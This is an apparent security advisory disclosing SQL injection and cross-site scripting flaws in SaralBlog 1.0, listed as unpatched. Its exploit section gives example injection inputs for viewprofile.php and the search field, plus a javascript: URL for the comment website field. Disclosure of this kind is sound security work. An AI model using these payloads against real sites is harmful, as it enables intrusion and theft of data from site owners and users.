New eVuln Advisory: SaralBlog XSS & Multiple SQL Injection Vulnerabilities http://evuln.com/vulns/40/summary/bt/ --------------------Summary---------------- Software: SaralBlog Sowtware's Web Site: http://www.saralblog.org/ Versions: 1.0 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) eVuln ID: EV0040 -----------------Description--------------- 1. Most of user defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code. 2. Cross-Site Scripting is possible. Vulnerable script: view.php Variable $website isn't properly sanitized. This can be used to insert arbitrary javascript code. --------------Exploit---------------------- Available at: http://evuln.com/vulns/40/exploit/bt/ 1. SQL Injection Example http://host/viewprofile.php? id=999%20union% 20select%201, 2,3,4,5,6,7/* 2. SQL Injection Example (gpc_magic_quotes: off) Search: aaaaa') union select 1,2,3,4,5,6/* 3. Cross-Site Scripting Adding new comment: Website: javascript:alert(123) --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)